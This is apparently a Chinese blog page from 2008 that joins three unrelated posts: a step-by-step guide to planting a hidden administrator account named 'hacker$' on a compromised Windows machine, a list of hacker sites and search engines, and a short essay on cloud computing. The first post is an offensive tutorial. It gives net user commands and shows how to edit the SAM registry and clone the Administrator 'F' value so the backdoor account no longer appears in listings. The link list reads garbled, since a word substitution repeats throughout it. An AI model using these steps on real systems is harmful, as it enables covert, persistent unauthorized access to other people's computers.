1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

2008年08月29日

为宣布和宣传他们自己的网络安全技术站点,很多网络安全技术专家和黑客联合在一起.大多数网络安全技术专家和黑客网络安全技术站点提供有关网络安全技术专家和黑客世界的信息,这些信息是以网络安全技术专家和黑客的观点表达的,常常为主流媒体所忽略.在网络安全技术专家和黑客的网络安全技术站点上,您会发现在较为流行的操作系统上最新发现的安全漏洞,甚至还会发现侵入别人计算机的网络安全技术专家和黑客程序.
  
首先介绍一下国外的网络安全技术站点:
 最新的网络安全技术都是最先从国外的网站上发布的,所以不要怕看英语!
 浏览下面的网络安全技术站点,可以让您从网络安全技术专家和黑客的角度来了解网络安全技术专家和黑客行为:
    · Cipherwar 提供有关网络安全技术专家和黑客行为的新闻,以及围绕政府对Internet立法、调控和控制行为的政治辩论(http://www.cipherwar.com).
    · Hack Canada 一个独特的网络安全技术站点,从加拿大人的视角,关注网络安全技术专家和黑客行为、电话线路盗用和无政府主义行为 (http://www.hackcanada.com).
    · Hideaway.Net 专门瞄准有关计算机安全的新闻,所以在这里能看到各种防火墙、服务器和浏览器的最新发现的缺陷(http://www.hideaway.net).
    · Insecure.org 列出您最喜欢的所有操作系统的许多安全漏洞和"可以利用之处",包括Windows、Solaris和Linux (http://www.insecure.org).
    · New Order 提供到各种网络安全技术专家和黑客资源的很多链接,如匿名重邮器、加密软件、ICQ漏洞、Novell网络的网络安全技术专家和黑客入侵和网络安全技术专家和黑客电子杂志(http://neworder.box.sk).
    · Sys-Security 致力于计算机安全研究的团体,提供有关端口扫描的大量信息(http://www.sys-security.com).
    · Underground News 提供网络安全技术专家和黑客工具和新闻,也销售背包和邮递员包(messager bag) (http://www.undergroundnews.com).
    · Attrition.org 有关网络安全技术专家和黑客文本和程序文件的新闻和档案(http://www.attrition.org).
    · BlackCode 经营所有服务的网络安全技术专家和黑客网络安全技术站点,包括售卖商品,提供免费下载的网络安全技术专家和黑客工具,以及提供一个代理服务器来隐藏您的身份,以便您在Internet上进行匿名浏览 (http://www.blackcode.com).
    · Wiretapped 专门提供入侵检测软件和加密法的网络安全技术站点(http://www.wiretapped.net).
    只有为数不多的网络安全技术专家和黑客网络安全技术站点能坚持一年以上.大多数都是出现时热热闹闹,然后当创建者失去了兴趣,转向其他爱好时,就消失了.因为网络安全技术专家和黑客网络安全技术站点的寿命非常短,要找到它们很难.但幸运的是,还是有办法找到它们.
    我再介绍几个网络安全技术专家和黑客搜索引擎.有很多专门查找网络安全技术专家和黑客网络安全技术站点的搜索引擎.这些网络安全技术专家和黑客搜索引擎可以帮助您迅速地找到任何东西,从源代码到最新的病毒,到攻击America Online或ICQ用户的在线骚扰程序的当前版本.如果本章前面列出的网络安全技术专家和黑客网络安全技术站点中没有提供您需要的东西,可以试试下面的专用搜索引擎:
    Secureroot: http://www.secureroot.com
    Startplaza.nu: http://www.startplaza.nu
    Astalavista :http://astalavista.box.sk
    Cyberarmy HakSearch: http://www.cyberarmy.com

    使用像Startplaza.nu这样的搜索引擎查找您需要的网络安全技术专家和黑客工具,网络安全技术专家和黑客网络安全技术站点列表
    很多网络安全技术专家和黑客喜欢声称自己的网络安全技术站点是Internet上有关网络安全技术专家和黑客信息的最好的、最全面的来源.因为有这么多网络安全技术专家和黑客网络安全技术站点都这样标榜,网络安全技术专家和黑客们整理了一些列表,按用户的投票数排列彼此竞争的网络安全技术专家和黑客网络安全技术站点.所以,如果您想了解时下最流行的网络安全技术专家和黑客网络安全技术站点,可以浏览下面的列表,选择您最喜欢的:
    Elite Toplist http://www.elitetoplist.com
    Secureroot http://www.secureroot.com
    Sub-List.Com http://underground.sub-list.com4.4.3 Web ring
    与其用一个搜索引擎在Internet上胡乱搜索,还不如使用一个网络环(web ring,是具有相似主题的网络安全技术站点的一个集合).网络环提供到专注于某个具体主题的网络安全技术站点的链接.如果您对什么感兴趣,比如说,对编写计算机病毒去骚扰America Online或破坏Web页面感兴趣,可以访问Web Ring网络安全技术站点(http://www.webring.org),单击Computers & Internet部分,然后选择Cyberculture 类别,最后单击Hacking类别,显示其他网络安全技术专家和黑客网络安全技术站点的一个列表

然后我们来提供几个国内比较好的网络安全技术也就是所谓的黑客网站啦:
1.爱国者安全网–原黑鹰红客基地:http://www.3800hk.com/ ,中国最大的网络安全资讯门户.这个站比较正规,里面的人才也比较多,最大的特点就是网站速度很快.
2.华夏黑客同盟:http://www.77169.com/ 心目中第二,软件很全,几乎别的地方找不到的黑客软件这里都能找到.
3.看雪软件安全网站:http://www.pediy.com/ 名声很大的软件破解网站及论坛,很多高手在里面
4.X-Foucus 网络安全焦点 :http://www.xfocus.net/ 中国人开的具有国际影响力的网络安全技术网站,提供最新技术文章和软件,与国际技术界接轨,有英文版.

2008年06月24日
所有的应用程序都在变得越来越大,这不禁让我们怀念起盖茨“用户只需要640K内存”的时代。这是1989年盖茨谈及计
算机科学的未来时所说的话。那时候,互联网还在开发;那时候,应用程序还处在“少快好省”的时代;那时候,100MB的硬盘简直能装下全世界的数据。不过,记忆里盖茨所有的预言都会被残酷的现实推翻,就好像04年的“ ‘两年后,垃圾邮件将成为与人们毫不相关的事情。’而垃圾邮件却铺天盖地”一样。
  随便找到一台主流的个人电脑,会发现越来越多的数据充斥其中,互联网背后的海量数据早就超过了人们想象的极限。再高端的配置在现如今用户的眼里也开始变得慢了起来,再大的硬盘也显得不够用,个人计算机什么时候开始承受起海量数据的计算了?我们的电脑要变成什么样子才能满足现如今数据的发展速度?
  于是,云出现了。云计算(cloud computing)被视为新兴的商业计算模型,利用高速互联网的传输能力,将数据的处理过程从个人计算机或服务器移到互联网上的计算机集群中。这些计算机都是很普通的工业标准服务器,由一个大型的数据处理中心管理,数据中心按客户的需要分配计算资源,达到与超级计算机同样的效果。
  这其实只是我们想象中的云计算,尽管现在很多企业在感兴趣并且开始进行努力。“云”,既是对那些网状分布的计算机的比喻,也指代数据的计算过程被隐匿起来,由服务器按你的需要,从漫天飞舞的云朵中找到符合需求的那一个。这确实是一件美好的事情。
  Gartner预测说,到2012年,八成财富1000强的企业将付费使用云计算服务,而三成企业将为云计算基础结构服务付费。尽管这还是一个概念中的平台或者说服务,尽管目前还没有成型的产品出现,但是云计算成功地将所有IT巨头的目光聚焦到自己身上,同时引爆竞争。
  5月1日,IBM的CEO 彭明盛与Google的CEO埃里克·施密特相会洛杉矶,把酒畅谈云计算。这不是他们第一次因为云计算而相聚。早在去年10月,两家公司就曾宣布过进行合作,为美国6所大学提供设备和资金,在下一代的程序员和系统架构师中推广大规模、高平行计算方案的应用。显然,IBM和谷歌的结盟已超出了研究范围,因为双方总裁都概括地谈到了建立全球服务器网络的计划,让消费者和企业可以从中访问到任何对象,包括最基本的电子邮件和文字处理服务以及企业级的处理功能与管理工具。
  IBM则在去年8月发布Blue Cloud蓝云计划,意在使公司数据中心与互联网运行更为贴近的计算机与软件产品组合,拥有着应用服务器、存储、管理软件等完备产品线的IBM更有理由进入云计算领域,他们不用担心数据从本地转移到互联网过程中的安全问题,他们可以只需要向用户出售云计算终端及服务即可。
  英特尔的MID也许更能超前体会到云计算带来的好处。这些MID设备更小尺寸、更轻重量,并且可以不考虑自己的硬件情况,在有互联网的地方,成为更强劲的移动终端。
  黑盒子成为Sun去年年末的亮点。这个基于云计算理论建立起来的“未来的数据中心”,不再会被局限在拥挤而闷热的机房里,而是一个个可移动的集装箱,企业可以把它移动到包括“郊外”在内的各种地方,降低机房的开支。
  云计算正在将我们从桌面推向互联网,也将这些巨头们放在了既竞争又合作的位置,在这新旧规则或者技术交替的时代,更早参与制定规则的企业将得更多回报,曾经被认为没落的互联网重燃战火。而对于用户来说,我们只需要做的是,把计算机当作接口,等待着把剩下的一切交给互联网吧。